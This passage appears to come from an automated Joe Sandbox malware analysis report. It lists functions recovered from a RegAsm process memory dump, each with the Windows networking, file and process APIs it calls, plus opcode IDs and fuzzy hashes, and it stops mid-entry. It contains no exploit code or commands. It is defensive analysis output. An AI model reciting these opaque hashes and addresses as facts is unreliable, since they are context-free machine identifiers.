                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b13a4c9756e6dbc5a3b479240f144414e6dfb9d172209e6f6427846867f8471
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41E0DF7A344001EFC384CB5CDC85EAA33E9AF842047180579B80AC73A2EB70ED19CB08
                                                                                                                                                                                                                                                            Function 0040C924 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(00000000), ref: 0040C94F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExistsFilePath
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1174141254-0
                                                                                                                                                                                                                                                            • Opcode ID: 20f0f2f987cdd6fd5d78be4d92f2ad059cd5cf2e3368b0de4e59f1860672bcd1
                                                                                                                                                                                                                                                            • Instruction ID: a0ac7273f53d20d96c15c6bff5cc153122d5beba8fb7721ef6fb638b5fbe53e8
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20f0f2f987cdd6fd5d78be4d92f2ad059cd5cf2e3368b0de4e59f1860672bcd1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E09276B002058FC788FB9CDCE4F6933E4EB46204B04003C9906D3351DA289D16CB48
                                                                                                                                                                                                                                                            Function 00407751 Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConnectInternet
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3050416762-0
                                                                                                                                                                                                                                                            • Opcode ID: b95de7b108c177cff31b336e0a3386d780ae9b85be1aeec919afe5d5e6169278
                                                                                                                                                                                                                                                            • Instruction ID: 1446014fd0c9d4017d764f9b938a641aa2b32dcb309b268e3664a91dcaf54a16
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b95de7b108c177cff31b336e0a3386d780ae9b85be1aeec919afe5d5e6169278
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F0A034E093418BC314CF69D54062AB7F2BFD9305F15C62DE85887364EA309C91CF41
                                                                                                                                                                                                                                                            Function 00422B74 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 00422B84
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModuleName
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                                                                                                                                            • Opcode ID: 52b15660bd697938981da5ee73889311184e970823131d8a2279e521e5bee4fd
                                                                                                                                                                                                                                                            • Instruction ID: 69e6cde24125f6890367141ee933c78470dc6f28d39b691ac87247349ccaad8d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52b15660bd697938981da5ee73889311184e970823131d8a2279e521e5bee4fd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD05E763801082BE600F74FFCC1FBA33A8FB83ABCF080035F288C3280C559A8994169
                                                                                                                                                                                                                                                            Function 0040C975 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                            • Opcode ID: 3fb8d76a0d4f9672b6b9978df7dcd38b4171413283df2e9b1cfd581a8d4a8782
                                                                                                                                                                                                                                                            • Instruction ID: 79fb95547d5fdbe54a16516f1546399437a45ab7f8c97ea9a6881ddec385e781
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fb8d76a0d4f9672b6b9978df7dcd38b4171413283df2e9b1cfd581a8d4a8782
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F03971944241CBE740EF6CEC8476977F0FB94314F14462CE894D72A1DB7499998B4A
                                                                                                                                                                                                                                                            Function 0040CAD1 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040CAEC
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                            • Opcode ID: 1fe233bd45b73fb4e76dadc43ffb76967d15a1422c2845191ef2c301cb6acfbd
                                                                                                                                                                                                                                                            • Instruction ID: 8f33944eb265aadd8b99b5613bb51d2a6a1012877fb87abd0653211fac53b3bf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fe233bd45b73fb4e76dadc43ffb76967d15a1422c2845191ef2c301cb6acfbd
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFE04870B412069FC704EFA5CD84F96B7B6FF84644F548568D401D7159EA719806C794
                                                                                                                                                                                                                                                            Function 00421992 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004219B0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                            • Opcode ID: 6ad2aecadb6b92fef9065b430b3f00a23771f5bd5df6e859b6afbc5f368a2d2c
                                                                                                                                                                                                                                                            • Instruction ID: 1cc98b9c078abeda64e2b049747d0090427da3c271b2c9e07a9196400bb093bd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ad2aecadb6b92fef9065b430b3f00a23771f5bd5df6e859b6afbc5f368a2d2c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88E0C2BF2002509FC310CB6ADC4085E772BFBC223032E0518E421D33E0D638E9028AA8
                                                                                                                                                                                                                                                            Function 0040BD53 Relevance: 1.5, APIs: 1, Instructions: 19fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040BD73
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                            • Opcode ID: 24114e56f6486e8bfd70d2abaa09d7b493a70cea7421b2c08c96600f2418ed62
                                                                                                                                                                                                                                                            • Instruction ID: 7de03404172e5aabe1c443ce8fe071b09326cd08ca7e4df849f82930eaead7d2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 24114e56f6486e8bfd70d2abaa09d7b493a70cea7421b2c08c96600f2418ed62
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BE0467A280301AFEB04DF50CCC0F2AB372FB8A720B14C058EC008B266E734E811AF60
                                                                                                                                                                                                                                                            Function 0041EFEF Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetCurrentHwProfileA.ADVAPI32(?), ref: 0041F011
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentProfile
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2104809126-0
                                                                                                                                                                                                                                                            • Opcode ID: 1bb8bf45926aeb78dc0df2a22b1925beb13621fe846422212df0629430937606
                                                                                                                                                                                                                                                            • Instruction ID: 8b1b12d0e7ad679d432470b63cf508538332a85973f9a3fcf61e176a271b0cc5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bb8bf45926aeb78dc0df2a22b1925beb13621fe846422212df0629430937606
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37E0C27A3002058BD324EF28DC90E9BB769AF97340F21842CBD4187351EA32EC088B91
                                                                                                                                                                                                                                                            Function 004070A7 Relevance: 1.5, APIs: 1, Instructions: 18filenetworkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000000C7,?), ref: 004070C0
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                            • Opcode ID: 546b1b817affd0ba002faa5689473d396effbf13e0107113c382e3037954a148
                                                                                                                                                                                                                                                            • Instruction ID: 087524e99e2e36aa6c24c0d744c8560dd19395c8f046e54837bd47bfdc5e2b69
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 546b1b817affd0ba002faa5689473d396effbf13e0107113c382e3037954a148
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DE012B6741111ABEB1CC764CC659BA7A66AF96280B24413CA41797AD0E631A901C651
                                                                                                                                                                                                                                                            Function 00406333 Relevance: 1.5, APIs: 1, Instructions: 18filenetworkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 0040634C
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                            • Opcode ID: b9918eb97e5bea99c1d356312d8d340aa729f123eee411683adfacc09c233fb8
                                                                                                                                                                                                                                                            • Instruction ID: e80a74c448b2809dfa2cf42497063a6acbaa13e565d0bdd883d0bc87c2d4b46b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b9918eb97e5bea99c1d356312d8d340aa729f123eee411683adfacc09c233fb8
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAE08CB6B0020BEFEF08CF04CCD1E65B3BAAB8430472480289405DB399E671ED028B50
                                                                                                                                                                                                                                                            Function 00422384 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00422398
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateGlobalStream
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2244384528-0
                                                                                                                                                                                                                                                            • Opcode ID: 626707349cb6978d03d3e19a4fb391f0d79e528f92faa6b35c17b36f3a53c805
                                                                                                                                                                                                                                                            • Instruction ID: 7bdeb3cd2f91353ee1d3f4ce7728727f60221488556750a91bea947e3788f92e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 626707349cb6978d03d3e19a4fb391f0d79e528f92faa6b35c17b36f3a53c805
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CBD05B753001025FF718CB59CC93F593356A755304F1C4524F602DB6D5E560D8028744
                                                                                                                                                                                                                                                            Function 00407913 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 0040792F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                            • Opcode ID: 424e219dfdf8514739f52499651c48f9878a3e7104e72651a24c05815333082c
                                                                                                                                                                                                                                                            • Instruction ID: 79d45554b27fa09bf4581156ee703008adca5f77a3fafbdbf00c8d7df8431c84
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 424e219dfdf8514739f52499651c48f9878a3e7104e72651a24c05815333082c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17E012B6B421569BEB18CB65DC91E9E337AEB56200B05802CA506A7250E930AD51CB90
                                                                                                                                                                                                                                                            Function 00404F86 Relevance: 1.5, APIs: 1, Instructions: 17filenetworkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,000007CF,?), ref: 00404F9F
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                            • Opcode ID: 571e24645761fac644e174942f847ef6c0013c5ba2d74888f91d1e860bba1106
                                                                                                                                                                                                                                                            • Instruction ID: 2cce16e57b110384986bc3907c8539cc9eec47c1517a23192c1d69bd0d79c129
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 571e24645761fac644e174942f847ef6c0013c5ba2d74888f91d1e860bba1106
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6E0C231B241119FD304EB94DC84D0677B6ABD57003048438A401DB358E231AD01CB40
                                                                                                                                                                                                                                                            Function 00420268 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • Process32Next.KERNEL32(?,?), ref: 0042027D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: NextProcess32
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1850201408-0
                                                                                                                                                                                                                                                            • Opcode ID: 3cf2509ff0fc67728fd6910ac9e61a6febb8140007dbc3dabbb60ed7bbd7c3ca
                                                                                                                                                                                                                                                            • Instruction ID: 472f168c98467f6050b8b6ae28b630018f91697d413617e88336b4e14123bb41
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3cf2509ff0fc67728fd6910ac9e61a6febb8140007dbc3dabbb60ed7bbd7c3ca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CE017B67002419FDB0CDB58DCA1F6673E1B798200F04087CE916CB3A0FA39DC049B14
                                                                                                                                                                                                                                                            Function 0042C354 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0042C36E
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileModuleName
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                                                                                                                                            • Opcode ID: dfa1b880525da585ea4735a285ae0e06df7a7b40c61ef2c56d92bfb2b3c2808a
                                                                                                                                                                                                                                                            • Instruction ID: a7402214a9c3345dda431d1f20edae581ea72c43da1f999cd6592ae19d341408
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dfa1b880525da585ea4735a285ae0e06df7a7b40c61ef2c56d92bfb2b3c2808a
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E5E05BB6B412409FE318C744DD90F5633E5A7C6341F04406CDB55DB7D1DE759D048728
                                                                                                                                                                                                                                                            Function 00423646 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: NextProcess32
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1850201408-0
                                                                                                                                                                                                                                                            • Opcode ID: 9e0d8f383895cfcf800a0cf09e3caa25afbf4b03fc6cf6bd0753ab5c419e899c
                                                                                                                                                                                                                                                            • Instruction ID: 9abe59a6ac43a9b84b513fa3df34008672bafd94d198bd606b6e833ccc4e43ac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9e0d8f383895cfcf800a0cf09e3caa25afbf4b03fc6cf6bd0753ab5c419e899c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 20D05B34302111EB8314CF0DDD41D56B3E9AFC6249394856CE105CB346D779DE168B59
                                                                                                                                                                                                                                                            Function 00409C5B Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00409C6D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: socket
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 98920635-0
                                                                                                                                                                                                                                                            • Opcode ID: b62aeab5212f7cc365a4e332f7e80607400786f412a85baa86ec53f08c962c95
                                                                                                                                                                                                                                                            • Instruction ID: e427cbbe3e3b83450029c41dc8cf312ea74f1a6a1087ca7c39bd8c843ca28d30
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b62aeab5212f7cc365a4e332f7e80607400786f412a85baa86ec53f08c962c95
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AD05B34380550D7E7249798DCD5F1562036FC0764F6C45296526BF7D1C2A55C514744
                                                                                                                                                                                                                                                            Function 0040A448 Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • recv.WS2_32(?,?,00001000,00000000), ref: 0040A45B
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: recv
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1507349165-0
                                                                                                                                                                                                                                                            • Opcode ID: a0b38797b0c4993cb6cb6c0d406990d8ac3111ba521a743e6bbe61eb680d21bf
                                                                                                                                                                                                                                                            • Instruction ID: 533c664c92f654cb3d350bcdb2dc7710a5b11fcccbc60dcf5c58030cdea738a0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0b38797b0c4993cb6cb6c0d406990d8ac3111ba521a743e6bbe61eb680d21bf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1ED05E30340501E7EB68CB09CC94F2676A2EFC4788F14403CA11A962E5C524EC55CA48
                                                                                                                                                                                                                                                            Function 0042351E Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: NextProcess32
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1850201408-0
                                                                                                                                                                                                                                                            • Opcode ID: 08c310df711f07a2628d32e9ecedf022eaf25dce794c6d43b118286a36e3db00
                                                                                                                                                                                                                                                            • Instruction ID: 30a14a1c631fd8df27b22c6e9e8fd007448dc770daa81c8ea299fb2972b56920
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 08c310df711f07a2628d32e9ecedf022eaf25dce794c6d43b118286a36e3db00
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DDD0C9B53510059FE748CB1DDCB2FA922D5EB89304F41043CE905C3391EA25EC004A69
                                                                                                                                                                                                                                                            Function 0040B9F7 Relevance: 1.3, APIs: 1, Instructions: 34sleepCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Sleep
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3472027048-0
                                                                                                                                                                                                                                                            • Opcode ID: 9eaabe2224cfc6cedc61a79e2c437a7780a764cab66168bb6b062424f86a40c7
                                                                                                                                                                                                                                                            • Instruction ID: 3e039caba67044b8d9b8e958b2cf6be79839125fb4120b1e979567a09ada8819
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9eaabe2224cfc6cedc61a79e2c437a7780a764cab66168bb6b062424f86a40c7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F8018176E00A069BC700DF6CDD41599B7B0FF966547188618E815E7311E734EBA1CB86
                                                                                                                                                                                                                                                            Function 0040BD06 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 0040BD26
                                                                                                                                                                                                                                                            Memory Dump Source
